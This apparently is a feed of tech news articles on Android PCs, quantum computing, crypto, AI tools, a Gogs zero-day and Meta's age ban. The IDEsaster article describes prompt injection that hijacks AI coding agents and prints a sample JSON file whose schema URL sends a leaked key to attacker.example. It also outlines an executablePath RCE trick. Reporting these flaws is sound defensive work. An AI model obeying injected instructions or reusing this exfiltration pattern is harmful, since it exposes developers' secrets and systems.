Google Plans to Bring Android to PCs With Aluminium - Key Details Here

 


Google isn’t exactly known for secrecy anymore. Unlike Apple, the company frequently reveals features early, allows products to leak, and even publishes official teasers ahead of major launches. Pixel devices, in particular, are often shown off well before press events, making it clear that Google prefers to guide the narrative rather than fight speculation. For most fans, excitement now comes from following Google’s roadmap rather than waiting for surprises.

There are still exceptions — especially when billions of dollars and the future of computing are involved. One of Google’s most ambitious and closely watched projects is its plan to merge Android and ChromeOS into a single operating system built for PCs. The move has the potential to reshape Chromebooks, redefine Android’s role beyond phones, and place Google in more direct competition with Apple, Microsoft, and the iPad.

ChromeOS, despite its success in education and enterprise environments, has never managed to break into the mainstream laptop market. While Chromebooks are affordable, they have long been criticized for limited offline functionality and a lack of flexibility compared to Windows and macOS. Even after gaining the ability to run Android apps, ChromeOS remained a niche platform, struggling to compete with more powerful and versatile alternatives. Over time, it became increasingly clear that Google’s enthusiasm for ChromeOS as a standalone operating system was fading.

Rumors about a unification of Android and ChromeOS began circulating about a year ago. Google confirmed the plan in July 2025 during a conversation with TechRadar and later made it official at Qualcomm’s Snapdragon Summit in September. At the event, Google announced a partnership with Qualcomm to develop a platform that blends mobile and desktop computing, with artificial intelligence at its core. Google’s Senior VP of Devices and Services, Rick Osterloh, made the company’s intentions unmistakable, stating that the two companies were "building together a common technical foundation for our products on PCs and desktop computing systems."

Further insight emerged when a now-removed Google job listing, discovered by Android Authority, revealed the internal codename “Aluminium.” The company was hiring a “Senior Product Manager, Android, Laptop and Tablets,” pointing to a unified vision across form factors. The British spelling of Aluminium is likely a nod to Chromium, the open-source project that underpins ChromeOS and the Chrome browser. Internally, the platform is sometimes abbreviated as “ALOS.”

The listing referenced a wide range of devices — including laptops, tablets, detachables, and even set-top boxes — across multiple tiers, from entry-level products to premium hardware. This suggests Google wants to move beyond the budget-focused Chromebook image and position its next operating system across a much broader spectrum of devices. While premium Chromebooks already exist, they’ve never gained significant traction, something Google appears determined to change.

Notably, the job description also mentioned transitioning “from ChromeOS to Aluminium with business continuity in the future.” This implies that ChromeOS may eventually be phased out, but not abruptly. Google seems aware that many schools and businesses rely on large Chromebook deployments and will need long-term support rather than a forced migration.

What remains unclear is how this transition will affect current Chromebook owners. The name “Aluminium” is almost certainly temporary, and Google is unlikely to ship the final product under that label. According to Android Authority, engineers have reportedly begun referring to existing software as “ChromeOS Classic” or “non-Aluminium ChromeOS.” This could mean the ChromeOS brand survives, though its underlying technology may change dramatically. Another possibility is branding the platform as “Android Desktop,” though that risks confusion with Android 16’s Desktop Mode.

There is some indication that certain existing Chromebooks may be able to upgrade. Aluminium is reportedly being tested on relatively modest hardware, including MediaTek Kompanio 520 chips and 12th-generation Intel Alder Lake processors. That said, devices would still need to meet specific RAM and storage requirements.

Artificial intelligence could ultimately be the deciding factor. Google has confirmed that Gemini will play a central role in Aluminium, and older processors may struggle to support its full capabilities. While Google has previously brought limited AI features to older hardware like Nest speakers, advanced on-device AI processing — particularly tasks involving local files or graphics rendering — may require newer chips designed specifically for AI acceleration.

Beyond hardware compatibility, a larger question looms: how serious is Google about competing in the PC market? Android is already far more widespread than ChromeOS, but convincing users that it can replace a Windows or macOS computer will be a major challenge. Google has historically struggled to get developers to build high-quality tablet apps for Android, let alone desktop-class software that rivals professional Windows applications. Users expecting to run demanding programs or high-end games may find the platform limiting, at least initially.

Some reports suggest that Google’s true target isn’t Windows or macOS, but Apple’s iPad. The iPad dominates more than half of the global tablet market, according to Statcounter, and Apple has steadily pushed its tablets closer to laptop territory. The iPad Air and Pro now use the same M-series chips found in MacBooks, while iPadOS 26 introduces more advanced multitasking and window management.

Crucially, iPads already have a mature ecosystem of high-quality apps, making them a staple in schools and businesses — the very markets Chromebooks once dominated. If Google can deliver an Android-based platform that matches the iPad’s capabilities while undercutting Apple on price, it could finally achieve the mainstream breakthrough it has long pursued.

As for timing, Google has officially set a 2026 launch window. While an early reveal is possible, the significance of the project suggests it will debut at a major event, such as Google I/O in May or a high-profile Pixel launch later in the year. The software is almost certain to align with Android 17, which is expected to enter beta by May and reach completion by fall. If schedules hold, the first Android-powered PCs could arrive in time for the 2026 holiday season, though delays could push hardware launches into 2027.

Google Partners With UK to Open Access to Willow Quantum Chip for Researchers

 

Google has revealed plans to collaborate with the UK government to allow researchers to explore potential applications of its advanced quantum processor, Willow. The initiative aims to invite scientists to propose innovative ways to use the cutting-edge chip, marking another step in the global race to build powerful quantum computers.

Quantum computing is widely regarded as a breakthrough frontier in technology, with the potential to solve complex problems that are far beyond the reach of today’s classical computers. Experts believe it could transform fields such as chemistry, medicine, and materials science.

Professor Paul Stevenson of the University of Surrey, who was not involved in the agreement, described the move as a major boost for the UK’s research community. He told the BBC it was "great news for UK researchers". The partnership between Google and the UK’s National Quantum Computing Centre (NQCC) will expand access to advanced quantum hardware for academics across the country.

"The new ability to access Google's Willow processor, through open competition, puts UK researchers in an enviable position," said Prof Stevenson.
"It is good news for Google, too, who will benefit from the skills of UK academics."

Unlike conventional computers found in smartphones and laptops, quantum machines operate on principles rooted in particle physics, allowing them to process information in entirely different ways. However, despite years of progress, most existing quantum systems remain experimental, with limited real-world use cases.

By opening Willow to UK researchers, the collaboration aims to help "uncover new real world applications". Scientists will be invited to submit detailed proposals outlining how they plan to use the chip, working closely with experts from both Google and the NQCC to design and run experiments.

Growing competition in quantum computing

When Google introduced the Willow chip in 2024, it was widely viewed as a significant milestone for the sector. The company is not alone in the race, with rivals such as Amazon and IBM also developing their own quantum technologies.

The UK already plays a key role in the global quantum ecosystem. Quantinuum, a company headquartered in Cambridge and Colorado, reached a valuation of $10 billion (£7.45 billion) in September, underlining investor confidence in the sector.

A series of breakthroughs announced throughout 2025 has led many experts to predict that quantum computers capable of delivering meaningful real-world impact could emerge within the next ten years.

Dr Michael Cuthbert, Director at the National Quantum Computing Centre, said the partnership would "accelerate discovery". He added that the advanced research it enables could eventually see quantum computing applied to areas such as "life science, materials, chemistry, and fundamental physics".

The NQCC already hosts seven quantum computers developed by UK-based companies including Quantum Motion, ORCA, and Oxford Ionics.

The UK government has committed £670 million to support quantum technologies, identifying the field as a priority within its Industrial Strategy. Officials estimate that quantum computing could add £11 billion to the UK economy by 2045.

Lugano: Swiss Crypto Hub Where Bitcoin Pays for Everything

 

The Swiss city of Lugano, located in the Italian-speaking canton of Ticino, has turned itself into the European capital for cryptocurrency through its bold “Plan ₿” scheme, which lets citizens and businesses transact in Bitcoin and Tether for almost everything. The joint program between the city of Lugano and Tether aims to make blockchain technology the core of the city’s financial infrastructure, making Lugano the first major European city to adopt crypto payments at this scale.

Widespread merchant adoption

More than 350 businesses in Lugano now accept Bitcoin, from shops to cafes, restaurants and yes, even luxury retailers. From coffee and burgers to designer bags, residents can buy it all with cryptocurrency — and still have the option to pay in Swiss francs. Entrepreneurs have adopted the system in large part because of cost – with transaction fees far lower for Bitcoin (less than 1 percent) than for credit cards (between 1.7 and 3.4 percent). 

The city council has now expanded cryptocurrency acceptance from retail transactions to all city payments and services. Residents and businesses can use a fully automated system, built with the help of Bitcoin Suisse, to pay taxes, preschool fees, or any other city-related bill in Bitcoin or Tether. Since the payment process is based on the Swiss QR-Bill, users simply scan the QR codes on their bills and pay via mobile wallets.

Technical infrastructure 

Bitcoin Suisse, the technical infrastructure provider, processes payments and manages integration with current municipal systems. The crypto payment option is alongside more traditional options such as bank transfer and payments at post office counters, so everyone’s needs are accommodated.

Deputy Chief Financial Officer Paolo Bortolin said Lugano is a “pioneer” at the municipal level in offering unlimited acceptance of Bitcoin and Tether without requiring the manual generation of special crypto-friendly invoices. Plan ₿ encompasses more than payment infrastructure, including educational initiatives such as the Plan ₿ Summer School, run in collaboration with local universities, and the annual Plan ₿ Forum conference held each October.

The initiative positions Lugano as Europe's premier destination for Bitcoin, blockchain, and decentralized technology innovation, with the Plan B Foundation guiding strategic development and long-term vision. City officials, including Mayor Michele Foletti and Economic Promotion Director Pietro Poretti, remain committed to scaling blockchain adoption throughout all facets of daily life in Lugano.

Adobe Brings Photo, Design, and PDF Editing Tools Directly Into ChatGPT

 



Adobe has expanded how users can edit images, create designs, and manage documents by integrating select features of its creative software directly into ChatGPT. This update allows users to make visual and document changes simply by describing what they want, without switching between different applications.

With the new integration, tools from Adobe Photoshop, Adobe Acrobat, and Adobe Express are now available inside the ChatGPT interface. Users can upload images or documents and activate an Adobe app by mentioning it in their request. Once enabled, the tool continues to work throughout the conversation, allowing multiple edits without repeatedly selecting the app.

For image editing, the Photoshop integration supports focused and practical adjustments rather than full professional workflows. Users can modify specific areas of an image, apply visual effects, or change settings such as brightness, contrast, and exposure. In some cases, ChatGPT presents multiple edited versions for users to choose from. In others, it provides interactive controls, such as sliders, to fine-tune the result manually.

The Acrobat integration is designed to simplify common document tasks. Users can edit existing PDF files, reduce file size, merge several documents into one, convert files into PDF format, and extract content such as text or tables. These functions are handled directly within ChatGPT once a file is uploaded and instructions are given.

Adobe Express focuses on design creation and quick visual content. Through ChatGPT, users can generate and edit materials like posters, invitations, and social media graphics. Every element of a design, including text, images, colors, and animations, can be adjusted through conversational prompts. If users later require more detailed control, their projects can be opened in Adobe’s standalone applications to continue editing.

The integrations are available worldwide on desktop, web, and iOS platforms. On Android, Adobe Express is already supported, while Photoshop and Acrobat compatibility is expected to be added in the future. These tools are free to use within ChatGPT, although advanced features in Adobe’s native software may still require paid plans.

This launch follows OpenAI’s broader effort to introduce third-party app integrations within ChatGPT. While some earlier app promotions raised concerns about advertising-like behavior, Adobe’s tools are positioned as functional extensions rather than marketing prompts.

By embedding creative and document tools into a conversational interface, Adobe aims to make design and editing more accessible to users who may lack technical expertise. The move also reflects growing competition in the AI space, where companies are racing to combine artificial intelligence with practical, real-world tools.

Overall, the integration represents a shift toward more interactive and simplified creative workflows, allowing users to complete everyday editing tasks efficiently while keeping professional software available for advanced needs.




Wi-Fi Jammers Pose a Growing Threat to Home Security Systems: What Homeowners Can Do


Wi-Fi technology powers most modern home security systems, from surveillance cameras to smart alarms. While this connectivity offers convenience, it also opens the door to new risks. One such threat is the growing use of Wi-Fi jammers—compact devices that can block wireless signals and potentially disable security systems just before a break-in. By updating your security setup, you can reduce this risk and better protect your home.

Key concerns homeowners should know:

  • Wi-Fi jammers can interrupt wireless security cameras and smart devices.
  • Even brief signal disruption may prevent useful footage from being recorded.

Wi-Fi jammers operate by overpowering a network with a stronger signal on the same frequency used by home security systems. Though the technology itself isn’t new, law enforcement believes it is increasingly being exploited by burglars trying to avoid identification. A report by KPRC Click2Houston described a case where a homeowner noticed their camera feed becoming distorted as thieves approached, allegedly using a backpack containing a Wi-Fi jammer. Similar incidents were later reported by NBC Los Angeles in high-end neighborhoods in California.

How criminals may use jammers:

  • Target wireless-only security setups.
  • Disable cameras before entering a property.
  • Avoid being captured on surveillance footage.

Despite these risks, Wi-Fi jammers are illegal in the United States under the Communications Act of 1934. Federal agencies including the Department of Justice, Homeland Security, and the Federal Communications Commission actively investigate and prosecute those who sell or use them. Some states, such as Indiana and Oregon, have strengthened laws to improve enforcement. Still, the devices remain accessible, making awareness and prevention essential.

Legal status at a glance:

  • Wi-Fi jammers are banned nationwide.
  • Selling or operating them can lead to serious penalties.
  • Enforcement varies by state, but possession is still illegal.

While it’s unclear how often burglars rely on this method, smart home devices remain vulnerable to signal interference. According to CNET, encryption protects data but does not stop jamming. They also note that casual use by criminals is uncommon due to the technical knowledge required. However, real-world cases in California and Texas highlight why extra safeguards matter.

Ways to protect your home:

  • Choose wired security systems that don’t rely on Wi-Fi.
  • Upgrade to dual-band routers using both 2.4 GHz and 5 GHz.
  • Opt for security systems with advanced encryption.
  • Regularly review and update your home security setup.

Taking proactive steps to safeguard your security cameras and smart devices can make a meaningful difference. Even a short disruption in surveillance may determine whether authorities can identify a suspect, making prevention just as important as detection.

AI Avatars Trialled to Ease UK Teacher Crisis

 

In the UK, where teacher recruitment and retention are becoming increasingly dire, schools have started experimenting with new and controversial technology, including AI-generated “deepfake” avatars and remote teaching staff. Local media outlets are tracking these experiments as possible answers to mass understaffing and overwork in the education sector, while delving into their ethics and practicalities.

Emergence of the deepfake teacher

One of the most radical experiments underway is the use of AI to construct realistic digital avatars of real-life teachers. At the Great Schools Trust, for example, staff are trialling technology that creates video clones of themselves to teach. These "deepfake" teachers are mainly intended to help students stay up to date with the curriculum if they have missed class for whatever reason. By deploying these avatars, schools hope they can provide students with reliable, high-quality instruction without further taxing the physical teacher’s time.

Advocates, including Mr. Ierston, maintain the technology is not replacing human teachers but freeing them from monotonous work. The vision is that AI can take over administrative tasks and routine delivery, with human teachers concentrating on personalised support and classroom management. In addition to catch-up lessons, the technology also has translation features, so schools can communicate with parents in dozens of different languages instantly.

Alongside AI avatars, schools are turning increasingly to remote teaching models to fill holes in core subjects such as maths. The report draws attention to a Lancashire secondary school that has appointed a maths teacher who now lives thousands of miles away and teaches the class via live video link, a strategy forced by necessity in communities where finding qualified teachers has become nearly impossible.

Human cost of high-tech solutions 

Despite the potential efficiency gains, the shift has sparked significant scepticism from unions and educators. Critics argue that teaching is fundamentally an interpersonal profession that relies on human connection, empathy, and the ability to read a room—qualities that a screen or an avatar cannot replicate. 

There are widespread concerns that such measures could de-professionalize the sector and serve as a "sticking plaster" rather than addressing the root causes of the recruitment crisis, such as pay and working conditions. While the government and tech advocates view these tools as a way to "level the playing field" and reduce workload, many in the profession remain wary of a future where the teacher at the front of the room might not be there at all.

AI in Cybercrime: What’s Real, What’s Exaggerated, and What Actually Matters

 



Artificial intelligence is increasingly influencing the cyber security landscape, but recent claims about “AI-powered” cybercrime often exaggerate how advanced these threats currently are. While AI is changing how both defenders and attackers operate, evidence does not support the idea that cybercriminals are already running fully autonomous, self-directed AI attacks at scale.

For several years, AI has played a defining role in cyber security as organisations modernise their systems. Machine learning tools now assist with threat detection, log analysis, and response automation. At the same time, attackers are exploring how these technologies might support their activities. However, the capabilities of today’s AI tools are frequently overstated, creating a disconnect between public claims and operational reality.

Recent attention has been driven by two high-profile reports. One study suggested that artificial intelligence is involved in most ransomware incidents, a conclusion that was later challenged by multiple researchers due to methodological concerns. The report was subsequently withdrawn, reinforcing the importance of careful validation. Another claim emerged when an AI company reported that its model had been misused by state-linked actors to assist in an espionage operation targeting multiple organisations.

According to the company’s account, the AI tool supported tasks such as identifying system weaknesses and assisting with movement across networks. However, experts questioned these conclusions due to the absence of technical indicators and the use of common open-source tools that are already widely monitored. Several analysts described the activity as advanced automation rather than genuine artificial intelligence making independent decisions.

There are documented cases of attackers experimenting with AI in limited ways. Some ransomware has reportedly used local language models to generate scripts, and certain threat groups appear to rely on generative tools during development. These examples demonstrate experimentation, not a widespread shift in how cybercrime is conducted.

Well-established ransomware groups already operate mature development pipelines and rely heavily on experienced human operators. AI tools may help refine existing code, speed up reconnaissance, or improve phishing messages, but they are not replacing human planning or expertise. Malware generated directly by AI systems is often untested, unreliable, and lacks the refinement gained through real-world deployment.

Even in reported cases of AI misuse, limitations remain clear. Some models have been shown to fabricate progress or generate incorrect technical details, making continuous human supervision necessary. This undermines the idea of fully independent AI-driven attacks.

There are also operational risks for attackers. Campaigns that depend on commercial AI platforms can fail instantly if access is restricted. Open-source alternatives reduce this risk but require more resources and technical skill while offering weaker performance.

The UK’s National Cyber Security Centre has acknowledged that AI will accelerate certain attack techniques, particularly vulnerability research. However, fully autonomous cyberattacks remain speculative.

The real challenge is avoiding distraction. AI will influence cyber threats, but not in the dramatic way some headlines suggest. Security efforts should prioritise evidence-based risk, improved visibility, and responsible use of AI to strengthen defences rather than amplify fear.



Neo AI Browser: How Norton’s AI-Driven Browser Aims to Change Everyday Web Use

 


Web browsers are increasingly evolving beyond basic internet access, and artificial intelligence is becoming a central part of that shift. Neo, an AI-powered browser developed by Norton, is designed to combine browsing, productivity tools, and security features within a single platform. The browser positions itself as a solution for users seeking efficiency, privacy control, and reduced online distractions.

Unlike traditional browsers that rely heavily on cloud-based data processing, Neo stores user information directly on the device. This includes browsing history, AI interactions, and saved preferences. By keeping this data local, the browser allows users to decide what information is retained, synchronized, or removed, addressing growing concerns around data exposure and third-party access.

Security is another core component of Neo’s design. The browser integrates threat protection technologies intended to identify and block phishing attempts, malicious websites, and other common online risks. These measures aim to provide a safer browsing environment, particularly for users who frequently navigate unfamiliar or high-risk websites.

Neo’s artificial intelligence features are embedded directly into the browsing experience. Users can highlight text on a webpage to receive simplified explanations or short summaries, which may help when reading technical, lengthy, or complex content. The browser also includes writing assistance tools that offer real-time grammar corrections and clarity suggestions, supporting everyday tasks such as emails, reports, and online forms.

Beyond text-based tools, Neo includes AI-assisted document handling and image-related features. These functions are designed to support content creation and basic processing tasks without requiring additional software. By consolidating these tools within the browser, Neo aims to reduce the need to switch between multiple applications during routine work.

To improve usability, Neo features a built-in ad blocker that limits intrusive advertising. Reducing ads not only minimizes visual distractions but can also improve page loading speeds. This approach aims to provide a smoother and more focused browsing experience for both professional and casual use.

Tab management is another area where Neo applies automation. Open tabs are grouped based on content type, helping users manage multiple webpages more efficiently. The browser also remembers frequently visited sites and ongoing tasks, allowing users to resume activity without manually reorganizing their workspace.

Customization plays a role in Neo’s appeal. Users can adjust the browser’s appearance, create shortcuts, and modify settings to better match their workflow. Neo also supports integration with external applications, enabling notifications and tool access without leaving the browser interface.

Overall, Neo reflects a broader trend toward AI-assisted browsing paired with stronger privacy controls. By combining local data storage, built-in security, productivity-focused AI tools, and performance optimization features, the browser presents an alternative approach to how users interact with the web. Whether it reshapes mainstream browsing habits remains to be seen, but it underlines how AI is steadily redefining everyday digital experiences.



Circle and Aleo Roll Out USDCx With Banking-Level Privacy Features

 

Aleo and Circle are launching USDCx, a new, privacy-centric version of the USDC stablecoin designed to provide "banking-level" confidentiality while maintaining regulatory visibility and dollar backing. The token is launching first on Aleo's testnet and was built using Circle's new xReserve platform, which allows partner blockchains to issue their own USDC-backed assets that interoperate with native USDC liquidity.

New role of USDCx 

USDCx remains pegged one-to-one with the U.S. dollar, but it is issued on Aleo, a layer-1 blockchain architected around zero-knowledge proofs for private transactions. Rather than broadcasting clear-text transaction details on-chain, Aleo represents transfers as encrypted data blobs that shield the sender, receiver, and amounts from public view.

Circle and Aleo position this as a response to institutional reluctance to use public blockchains, where transaction histories are permanently transparent and can expose sensitive commercial information or trading strategies. By combining the predictability of a stablecoin with privacy, they hope to make on-chain dollars more palatable to banks, enterprises, and fintech platforms.

Despite the privacy focus, USDCx is not an absolute anonymity network. Every transaction contains a "compliance record" that is not visible on the main chain but can be viewed by Circle if a regulatory or law enforcement agency requests information. Aleo executives describe this as a "banking level of privacy": a middle ground that balances confidentiality with regulatory access rather than the absolute anonymity methods found in other privacy-focused currencies.

Target use cases and strategy 

Aleo says it is seeing strong inbound interest from payroll processors, infrastructure providers, foreign aid projects, and national security-related applications that require flows to be confidential yet traceable. Payroll services such as Request Finance and Toku, along with prediction markets, are assessing USDCx as a way to pay salaries and wages without revealing income information or strategy on a public blockchain.

USDCx on Aleo is a part of a larger strategy being undertaken by Circle that involves its xReserve infrastructure and an upcoming stablecoin-optimized Layer 1 network named "Arc," which aims to make USDC-compatible assets programmable and interoperate across different chains. Aleo, which had raised capital from investors such as a16z and Coinbase Ventures for developing zero-knowledge solutions, believes a mainnet launch for USDCx will follow the end of the current testnet period.

IDEsaster Report: Severe Bugs in AI Coding Agents Can Lead to Data Theft and Remote Code Execution


Using AI agents for data exfiltration and RCE

A six-month research effort into AI-based development tools has disclosed over thirty security bugs that allow remote code execution (RCE) and data exfiltration. The IDEsaster findings show how AI agents deployed in IDEs like Visual Studio Code, Zed, and JetBrains products, as well as various commercial assistants, can be tricked into leaking sensitive data or launching attacker-controlled code.

The research reports that 100% of tested AI IDEs and coding agents were vulnerable. Impacted products include GitHub Copilot, Windsurf, Cursor, Kiro.dev, Zed.dev, Roo Code, Junie, Cline, Gemini CLI, and Claude Code. The disclosures include at least twenty-four assigned CVEs as well as additional AWS advisories.

AI assistant exploitation

The main problem comes from the way AI agents interact with IDE features. These editors were never designed for autonomous components that can read, edit, and create files, and once-harmless features become attack surfaces when AI agents acquire those capabilities. In their threat models, AI IDEs essentially disregard the base software: because these features have existed for years, they are assumed to be inherently safe.

Attack tactic 

However, the same functionalities can be weaponized into RCE and data-exfiltration primitives once autonomous AI agents are included. The researchers report that this is an IDE-agnostic attack chain.

It begins with context poisoning via prompt injection. Covert instructions can be planted in file names, rule files, READMEs, and outputs from malicious MCP servers. When an agent reads that context, it can be redirected to run authorized actions that activate malicious behaviours in the core IDE. The last stage exploits built-in features to steal data or run attacker-controlled code in AI IDEs sharing core software layers.

Examples

One example involves writing a JSON file that references a remote schema. When the IDE automatically retrieves that schema, parameters inserted by the agent, including sensitive information gathered earlier in the chain, are leaked to the remote server. This behavior was observed in Zed, JetBrains IDEs, and Visual Studio Code, and developer safeguards such as diff previews did not suppress the outbound request.
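As a rough illustration of that step, the sketch below writes the kind of JSON file described in the report. The attacker domain, query parameter, and file name are invented for the example and are not taken from the IDEsaster write-up.

    # Illustrative sketch only: the sort of file an injected agent might be coaxed
    # into creating. Many IDEs fetch "$schema" URLs automatically to offer
    # validation and autocompletion, which triggers the outbound request.
    import json

    leaked = "API_KEY=abc123"  # stand-in for data gathered earlier in the chain
    doc = {
        "$schema": f"https://attacker.example/schema.json?leak={leaked}",
        "name": "innocuous-config",
    }

    with open("settings.generated.json", "w") as f:
        json.dump(doc, f, indent=2)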

Another case study uses altered IDE settings to demonstrate full remote code execution. By planting an executable file in the workspace and then changing configuration fields such as php.validate.executablePath, an attacker can make the IDE run arbitrary code as soon as a relevant file type is opened or created. JetBrains tools show similar exposure through workspace metadata.
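One possible mitigation, sketched below on the assumption that workspace settings live in a .vscode/settings.json file, is to flag any setting whose key ends in "executablePath" and whose value is a relative path into the workspace. The file location and check are illustrative, not a recommendation from the report.

    # Hedged defensive sketch: flag workspace settings that redirect an
    # "*.executablePath"-style option to a file inside the workspace, which is
    # the pattern the case study above abuses. Paths and names are illustrative.
    import json
    from pathlib import Path

    def suspicious_settings(workspace: str) -> list[str]:
        settings_file = Path(workspace) / ".vscode" / "settings.json"
        if not settings_file.exists():
            return []
        settings = json.loads(settings_file.read_text())
        findings = []
        for key, value in settings.items():
            if key.endswith("executablePath") and not Path(str(value)).is_absolute():
                findings.append(f"{key} -> {value}")
        return findings

    print(suspicious_settings("."))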

According to the IDEsaster report, “It’s impossible to entirely prevent this vulnerability class short-term, as IDEs were not initially built following the Secure for AI principle. However, these measures can be taken to reduce risk from both a user perspective and a maintainer perspective.”


5 Critical Situations Where You Should Never Rely on ChatGPT


Just a few years after its launch, ChatGPT has evolved into a go-to digital assistant for tasks ranging from quick searches to event planning. While it undeniably offers convenience, treating it as an all-knowing authority can be risky. ChatGPT is a large language model, not an infallible source of truth, and it is prone to misinformation and fabricated responses. Understanding where its usefulness ends is crucial.

Here are five important areas where experts strongly advise turning to real people, not AI chatbots:

  • Medical advice
ChatGPT cannot be trusted with health-related decisions. It is known to provide confident yet inaccurate information, and it may even acknowledge errors only after being corrected. Even healthcare professionals experimenting with AI agree that it can offer only broad, generic insights — not tailored guidance based on individual symptoms.

Despite this, the chatbot can still respond if you ask, "Hey, what's that sharp pain in my side?", instead of urging you to seek urgent medical care. The core issue is that chatbots cannot distinguish fact from fiction. They generate responses by blending massive amounts of data, regardless of accuracy.

ChatGPT is not, and likely never will be, a licensed medical professional. While it may provide references if asked, those sources must be carefully verified. In several cases, people have reported real harm after following chatbot-generated health advice.

  • Therapy
Mental health support is essential, yet often expensive. Even so-called "cheap" online therapy platforms can cost around $65 per session, and insurance coverage remains limited. While it may be tempting to confide in a chatbot, this can be dangerous.

One major concern is ChatGPT’s tendency toward agreement and validation. In therapy, this can be harmful, as it may encourage behaviors or beliefs that are objectively damaging. Effective mental health care requires an external, trained professional who can challenge harmful thought patterns rather than reinforce them.

There is also an ongoing lawsuit alleging that ChatGPT contributed to a teen’s suicide — a claim OpenAI denies. Regardless of the legal outcome, the case highlights the risks of relying on AI for mental health support. Even advocates of AI-assisted therapy admit that its limitations are significant.

  • Advice during emergencies
In emergencies, every second counts. Whether it’s a fire, accident, or medical crisis, turning to ChatGPT for instructions is a gamble. Incorrect advice in such situations can lead to severe injury or death.

Preparation is far more reliable than last-minute AI guidance. Learning basic skills like CPR or the Heimlich maneuver, participating in fire drills, and keeping emergency equipment on hand can save lives. If possible, always call emergency services rather than relying on a chatbot. This is one scenario where AI is least dependable.

  • Password generation
Using ChatGPT to create passwords may seem harmless, but it carries serious security risks. There is a strong possibility that the chatbot could generate identical or predictable passwords for multiple users. Without precise instructions, the suggested passwords may also lack sufficient complexity.

Additionally, chatbots often struggle with basic constraints, such as character counts. More importantly, ChatGPT stores prompts and outputs to improve its systems, raising concerns about sensitive data being reused or exposed.

Instead, experts recommend dedicated password generators offered by trusted password managers or reputable online tools, which are specifically designed with security in mind (see the short sketch after this list).
  • Future predictions
If even leading experts struggle to predict the future accurately, it’s unrealistic to expect ChatGPT to do better. Since AI models frequently get present-day facts wrong, their long-term forecasts are even less reliable.

Using ChatGPT to decide which stocks to buy, which team will win, or which career path will be most profitable is unwise. While it can be entertaining to ask speculative questions about humanity centuries from now, such responses should be treated as curiosity-driven thought experiments — not actionable guidance.
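On the password point above, a dedicated generator does nothing exotic: it draws from a cryptographically secure random source on your own machine. The minimal sketch below shows that idea using Python's standard secrets module; the length and character set are illustrative choices, not any particular tool's defaults.

    # Minimal sketch of local password generation with Python's standard library.
    # "secrets" uses a cryptographically secure random source, and nothing is
    # sent to a remote service. Length and alphabet are illustrative choices.
    import secrets
    import string

    def generate_password(length: int = 20) -> str:
        alphabet = string.ascii_letters + string.digits + string.punctuation
        return "".join(secrets.choice(alphabet) for _ in range(length))

    print(generate_password())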

ChatGPT can be a helpful tool when used appropriately, but knowing its limitations is essential. For critical decisions involving health, safety, security, or mental well-being, real professionals remain irreplaceable.


700+ Self-Hosted Git Servers Hit by a Zero-Day Exploited in the Wild


Hackers actively exploit zero-day bug

Threat actors are abusing a zero-day bug in Gogs, a popular self-hosted Git service. The open-source project hasn't fixed it yet.

About the attack 

Over 700 instances have been impacted in these attacks. Wiz researchers described their discovery as "accidental," saying it happened in July while they were analyzing malware on a compromised system. During the investigation, the experts "identified that the threat actor was leveraging a previously unknown flaw to compromise instances" and "responsibly disclosed this vulnerability to the maintainers."

The team informed Gogs' maintainers about the bug; they are now working on a fix.

The flaw is tracked as CVE-2025-8110. It is primarily a bypass of an earlier patched flaw (CVE-2024-55947) that lets authenticated users overwrite files outside the repository, which leads to remote code execution (RCE).

About Gogs

Gogs is written in Go and lets users host Git repositories on their own servers or cloud infrastructure, without relying on GitHub or other third parties.

Git, and therefore Gogs, allows symbolic links, which act as shortcuts to another file and can point to locations outside the repository. The Gogs API also allows files to be created and edited outside the regular Git protocol.
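To make the risk concrete, the sketch below shows the general check a repository file API needs before writing: resolve the destination path, following any symbolic links, and refuse it if it lands outside the repository root. The paths and function name are illustrative and are not Gogs' actual code.

    # Hedged sketch of a path-escape check: resolve the target, following
    # symbolic links, and reject anything outside the repository root.
    from pathlib import Path

    def is_inside_repo(repo_root: str, relative_target: str) -> bool:
        root = Path(repo_root).resolve()
        resolved = (root / relative_target).resolve()  # follows symbolic links
        return resolved == root or root in resolved.parents

    # If "config" is a symlink to "../../etc", then "config/passwd" resolves
    # outside the repository and the write should be refused.
    print(is_inside_repo("/srv/gogs/repos/demo", "config/passwd"))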

Patch update 

The previous patch didn't address this symbolic-link technique, which lets threat actors exploit the flaw and remotely deploy malicious code.

While researchers haven't linked the attacks to any particular gang or person, they believe the threat actors are based in Asia.

Other incidents 

Last year, Mandiant found Chinese state-sponsored hackers abusing a critical flaw in F5 through Supershell, and selling the access to impacted UK government agencies, US defense organizations, and others.

Researchers still don't know what threat actors are doing with access to the compromised instances. "In the environments where we have visibility, the malware was removed quickly so we did not see any post-exploitation activity. We don't have visibility into other compromised servers, beyond knowing they're compromised," researchers said.

How to stay safe?

Wiz has advised users to immediately disable open registration (if it is not needed) and to limit internet exposure by shielding self-hosted Git services behind a VPN. Users should also watch for new repositories with unexpected use of the PutContents API or random eight-character names.

For more details, readers can see the full list of indicators published by the researchers.



Meta Begins Removing Under-16 Users Ahead of Australia’s New Social Media Ban

 



Meta has started taking down accounts belonging to Australians under 16 on Instagram, Facebook and Threads, beginning a week before Australia’s new age-restriction law comes into force. The company recently alerted users it believes are between 13 and 15 that their profiles would soon be shut down, and the rollout has now begun.

Current estimates suggest that hundreds of thousands of accounts across Meta’s platforms will be affected. Since Threads operates through Instagram credentials, any underage Instagram account will also lose access to Threads.

Australia’s new policy, which becomes fully active on 10 December, prevents anyone under 16 from holding an account on major social media sites. This law is the first of its kind globally. Platforms that fail to take meaningful action can face penalties reaching up to 49.5 million Australian dollars. The responsibility to monitor and enforce this age limit rests with the companies, not parents or children.

A Meta spokesperson explained that following the new rules will require ongoing adjustments, as compliance involves several layers of technology and review. The company has argued that the government should shift age verification to app stores, where users could verify their age once when downloading an app. Meta claims this would reduce the need for children to repeatedly confirm their age across multiple platforms and may better protect privacy.

Before their accounts are removed, underage users can download and store their photos, videos and messages. Those who believe Meta has made an incorrect assessment can request a review and prove their age by submitting government identification or a short video-based verification.

The new law affects a wide list of services, including Facebook, Instagram, Snapchat, TikTok, Threads, YouTube, X, Reddit, Twitch and Kick. However, platforms designed for younger audiences or tools used primarily for education, such as YouTube Kids, Google Classroom and messaging apps like WhatsApp, are not included. Authorities have also been examining whether children are shifting to lesser-known apps, and companies behind emerging platforms like Lemon8 and Yope have already begun evaluating whether they fall under the new rules.

